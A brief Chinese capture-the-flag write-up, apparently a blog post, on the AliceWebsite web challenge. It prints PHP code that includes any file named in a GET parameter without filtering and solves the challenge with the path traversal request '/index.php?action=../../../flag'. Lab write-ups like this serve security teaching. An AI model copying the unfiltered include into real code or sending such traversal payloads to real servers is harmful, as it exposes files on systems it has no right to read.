BUU [网鼎杯 2020 半决赛]AliceWebsite

  • 开发
  • 36

BUU [网鼎杯 2020 半决赛]AliceWebsite

开题:

image-20231203030051853

hint附件是源码。在index.php中有一个毫无过滤的本地文件包含

<?php
$action = (isset($_GET['action']) ? $_GET['action'] : 'home.php');
if (file_exists($action)) {
    include $action;
} else {
    echo "File not found!";
}
?>

../往上跳目录,在根目录下/flag文件中找到flag

/index.php?action=../../../flag

image-20231203030338525

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-12 05:10:04       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-12 05:10:04       100 阅读

  9. 在Django里面运行非项目文件

    2024-03-12 05:10:04       82 阅读

  19. Python语言-面向对象

    2024-03-12 05:10:04       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-03-12 05:10:04       85 阅读

热门阅读

  3. 剑指offer面试题31:栈的压入、弹出序列

    2024-03-12 05:10:04       34 阅读

  4. 【lv15 day9 原子变量和自旋锁的应用】

    2024-03-12 05:10:04       39 阅读

  7. 使用docker搭建squoosh

    2024-03-12 05:10:04       38 阅读

  9. react 中组件的传参 怎么设置为可选的,比如加上?

    2024-03-12 05:10:04       42 阅读

  10. 如何防范企业内部安全威胁?

    2024-03-12 05:10:04       32 阅读

  13. Minio docker容器化部署配置详情

    2024-03-12 05:10:04       40 阅读

  15. 二叉树的层序遍历

    2024-03-12 05:10:04       42 阅读

  18. 服务器访问慢怎么办

    2024-03-12 05:10:04       38 阅读

  21. 【力扣100】198.打家劫舍

    2024-03-12 05:10:04       39 阅读

  23. springboot参数传递总结

    2024-03-12 05:10:04       35 阅读

  24. json 基本上面试题目比较常问

    2024-03-12 05:10:04       42 阅读

  27. 大数据笔记

    2024-03-12 05:10:04       34 阅读

  28. 随想录算法训练营第五十四天|392.判断子序列、115.不同的子序列

    2024-03-12 05:10:04       42 阅读

  29. C 语言中 #define 预处理器指令

    2024-03-12 05:10:04       37 阅读